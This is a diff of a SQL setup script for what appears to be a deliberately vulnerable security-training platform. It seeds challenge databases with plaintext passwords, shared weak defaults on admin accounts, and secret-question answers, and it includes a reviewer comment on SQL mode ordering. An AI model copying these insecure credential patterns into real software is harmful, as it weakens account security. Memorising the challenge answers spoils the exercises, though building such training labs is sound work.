+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (4524, 'privileged', 'default', 'spoiltbrat@security.com', 'admin');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
COMMIT;
@@ -1160,115 +674,48 @@ COMMIT;
-- Session Management Challenge Six Schema
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSix`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSix` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalSix` ;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSix` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSix` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalSix` ;
-- -----------------------------------------------------
-- Table `BrokenAuthAndSessMangChalSix`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSix`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- `secretQuestion` VARCHAR
-(
- 191
-) NOT NULL ,
- `secretAnswer` VARCHAR
-(
- 128
-) NOT NULL,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSix`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userAddress` VARCHAR(128) NOT NULL ,
+ `secretQuestion` VARCHAR(191) NOT NULL ,
+ `secretAnswer` VARCHAR(128) NOT NULL,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `BrokenAuthAndSessMangChalSix`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalSix`;
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (1224, 'manager', '!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com',
- 'What is the first name of the person you first kissed?', 'Lena Andrysiak');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (1225, 'sean', '!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com',
- 'What is the first name of the person you first kissed?', 'Ronit Tornincasa');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (3214, 'administrator', '!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com',
- 'What is the last name of the teacher who gave you your first failing grade?', 'Aran Keegan');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (3212, 'root', '!148972hsfalkjlkfi381', 'elitehacker@shepherd.com',
- 'What is the name of the place your wedding reception was held?', 'Deerburn Hotel');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6344, 'superuser', '!148972hsfalkjlkfi381', 'superman@security.com',
- 'Who was the first person to beat you up when you were 8 years old?', 'Lileas Lockwood');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com',
- 'What was the name of the person who stole your TV the second time?', 'Olwen Sordi');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6343, 'mark', '148!972hsfalkjlkfi381', 'superman2@security.com', 'Who is your favourite Barista?',
- 'Buzz Fendall');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6342, 'markdenihan', '148!972hsfalkjlkfi381', 'superman3@security.com',
- 'Who is your most favourite person you have not met?', 'Etna Filippi');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com',
- 'Who is your most favourite person you have not met?', 'Emily Fabian');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com',
- 'Who is your most favourite person you have not met?', 'Leola Naggia');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com',
- 'Who is your most favourite person you have not met?', 'Gladys Gabrielli');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com',
- 'Who is your most favourite person you have not met?', 'Morag Bristol');
+USE `BrokenAuthAndSessMangChalSix`;
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1224, 'manager', '!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com', 'What is the first name of the person you first kissed?', 'Lena Andrysiak');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1225, 'sean', '!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com', 'What is the first name of the person you first kissed?', 'Ronit Tornincasa');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3214, 'administrator', '!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com','What is the last name of the teacher who gave you your first failing grade?', 'Aran Keegan');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3212, 'root', '!148972hsfalkjlkfi381', 'elitehacker@shepherd.com','What is the name of the place your wedding reception was held?', 'Deerburn Hotel');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6344, 'superuser', '!148972hsfalkjlkfi381', 'superman@security.com', 'Who was the first person to beat you up when you were 8 years old?', 'Lileas Lockwood');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'What was the name of the person who stole your TV the second time?', 'Olwen Sordi');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6343, 'mark', '148!972hsfalkjlkfi381', 'superman2@security.com', 'Who is your favourite Barista?', 'Buzz Fendall');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6342, 'markdenihan', '148!972hsfalkjlkfi381', 'superman3@security.com', 'Who is your most favourite person you have not met?', 'Etna Filippi');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'Who is your most favourite person you have not met?', 'Emily Fabian');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'Who is your most favourite person you have not met?', 'Leola Naggia');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'Who is your most favourite person you have not met?', 'Gladys Gabrielli');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'Who is your most favourite person you have not met?', 'Morag Bristol');
COMMIT;
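Review bot: The saved session settings are restored (`SET SQL_MODE=@OLD_SQL_MODE;` and the two lines after it) before `START TRANSACTION`, so the seed INSERTs run under the server's default SQL mode rather than `TRADITIONAL`. On a server whose default mode is not strict, an over-long seed value would presumably be truncated with a warning instead of failing the load, leaving a challenge account that silently differs from the script. Moving the three restore lines to after the section's final `COMMIT;` would keep strict checking for the seed data. The same ordering appears in the Challenge Seven, CryptShop and UrlAccessThree hunks.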
@@ -1277,115 +724,48 @@ COMMIT;
-- Session Management Challenge Seven Schema
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSeven`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalSeven` ;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSeven` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalSeven` ;
-- -----------------------------------------------------
-- Table `BrokenAuthAndSessMangChalSeven`.`users`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSeven`.`users`
-(
- `userId`
- INT
- NOT
- NULL,
- `userName`
- VARCHAR
-(
- 32
-) NOT NULL ,
- `userPassword` VARCHAR
-(
- 128
-) NOT NULL ,
- `userAddress` VARCHAR
-(
- 128
-) NOT NULL ,
- `secretQuestion` VARCHAR
-(
- 191
-) NOT NULL ,
- `secretAnswer` VARCHAR
-(
- 128
-) NOT NULL,
- PRIMARY KEY
-(
- `userId`
-) )
- ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSeven`.`users` (
+ `userId` INT NOT NULL ,
+ `userName` VARCHAR(32) NOT NULL ,
+ `userPassword` VARCHAR(128) NOT NULL ,
+ `userAddress` VARCHAR(128) NOT NULL ,
+ `secretQuestion` VARCHAR(191) NOT NULL ,
+ `secretAnswer` VARCHAR(128) NOT NULL,
+ PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `BrokenAuthAndSessMangChalSeven`.`users`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalSeven`;
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (1224, 'manager', '!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com', 'What is your favourite flower?',
- 'Jade Vine');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (1225, 'sean', '!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com', 'What is your favourite flower?',
- 'Corpse Flower');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (3214, 'administrator', '!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com', 'What is your favourite flower?',
- 'Gibraltar Campion');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (3212, 'root', '!148972hsfalkjlkfi381', 'elitehacker@shepherd.com', 'What is your favourite flower?',
- 'Franklin Tree');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6344, 'superuser', '!148972hsfalkjlkfi381', 'superman@security.com', 'What is your favourite flower?',
- 'Jade Vine');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'What is your favourite flower?',
- 'Middlemist Red');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6343, 'mark', '148!972hsfalkjlkfi381', 'superman2@security.com', 'What is your favourite flower?',
- 'Chocolate Cosmos');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6342, 'markdenihan', '148!972hsfalkjlkfi381', 'superman3@security.com', 'What is your favourite flower?',
- 'Ghost Orchid');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'What is your favourite flower?',
- 'Jade Vine');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'What is your favourite flower?',
- 'Ghost Orchid');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'What is your favourite flower?',
- 'Corpse Flower');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
- `secretQuestion`, `secretAnswer`)
-VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'What is your favourite flower?',
- 'Gibraltar Campion');
+USE `BrokenAuthAndSessMangChalSeven`;
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1224, 'manager', '!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com', 'What is your favourite flower?', 'Jade Vine');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1225, 'sean', '!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com', 'What is your favourite flower?', 'Corpse Flower');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3214, 'administrator', '!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com','What is your favourite flower?', 'Gibraltar Campion');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3212, 'root', '!148972hsfalkjlkfi381', 'elitehacker@shepherd.com', 'What is your favourite flower?', 'Franklin Tree');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6344, 'superuser', '!148972hsfalkjlkfi381', 'superman@security.com', 'What is your favourite flower?', 'Jade Vine');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'What is your favourite flower?', 'Middlemist Red');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6343, 'mark', '148!972hsfalkjlkfi381', 'superman2@security.com', 'What is your favourite flower?', 'Chocolate Cosmos');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6342, 'markdenihan', '148!972hsfalkjlkfi381', 'superman3@security.com', 'What is your favourite flower?', 'Ghost Orchid');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'What is your favourite flower?', 'Jade Vine');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'What is your favourite flower?', 'Ghost Orchid');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'What is your favourite flower?', 'Corpse Flower');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'What is your favourite flower?', 'Gibraltar Campion');
COMMIT;
@@ -1395,99 +775,54 @@ COMMIT;
-- -----------------------------------------------------
-- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
-DROP SCHEMA IF EXISTS `CryptShop`;
-CREATE SCHEMA IF NOT EXISTS `CryptShop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`CryptShop` ;
+DROP SCHEMA IF EXISTS `CryptShop` ;
+CREATE SCHEMA IF NOT EXISTS `CryptShop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `CryptShop` ;
-- -----------------------------------------------------
-- Table `CryptShop`.`items`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `CryptShop`.`items`
-(
- `itemId`
- INT
- NOT
- NULL,
- `itemName`
- VARCHAR
-(
- 45
-) NULL,
- `itemCost` INT NULL,
- PRIMARY KEY
-(
- `itemId`
-))
- ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `CryptShop`.`items` (
+ `itemId` INT NOT NULL,
+ `itemName` VARCHAR(45) NULL,
+ `itemCost` INT NULL,
+ PRIMARY KEY (`itemId`))
+ENGINE = InnoDB;
-- -----------------------------------------------------
-- Table `CryptShop`.`coupons`
-- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `CryptShop`.`coupons`
-(
- `couponId`
- INT
- NOT
- NULL,
- `perCentOff`
- INT
- NULL,
- `couponCode`
- VARCHAR
-(
- 128
-) NULL,
- `itemId` INT NOT NULL,
- PRIMARY KEY
-(
- `couponId`
-),
- INDEX `fk_coupons_items_idx`
-(
- `itemId` ASC
-),
- CONSTRAINT `fk_coupons_items`
- FOREIGN KEY
-(
- `itemId`
-)
- REFERENCES `CryptShop`.`items`
-(
- `itemId`
-)
+CREATE TABLE IF NOT EXISTS `CryptShop`.`coupons` (
+ `couponId` INT NOT NULL,
+ `perCentOff` INT NULL,
+ `couponCode` VARCHAR(128) NULL,
+ `itemId` INT NOT NULL,
+ PRIMARY KEY (`couponId`),
+ INDEX `fk_coupons_items_idx` (`itemId` ASC),
+ CONSTRAINT `fk_coupons_items`
+ FOREIGN KEY (`itemId`)
+ REFERENCES `CryptShop`.`items` (`itemId`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
- ENGINE = InnoDB;
+ENGINE = InnoDB;
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
-- -----------------------------------------------------
-- Data for table `CryptShop`.`items`
-- -----------------------------------------------------
START TRANSACTION;
-USE
-`CryptShop`;
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (1, 'Pineapple', 30);
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (2, 'Orange', 3000);
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (3, 'Apple', 45);
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (4, 'Banana', 15);
+USE `CryptShop`;
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (1, 'Pineapple', 30);
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (2, 'Orange', 3000);
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (3, 'Apple', 45);
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (4, 'Banana', 15);
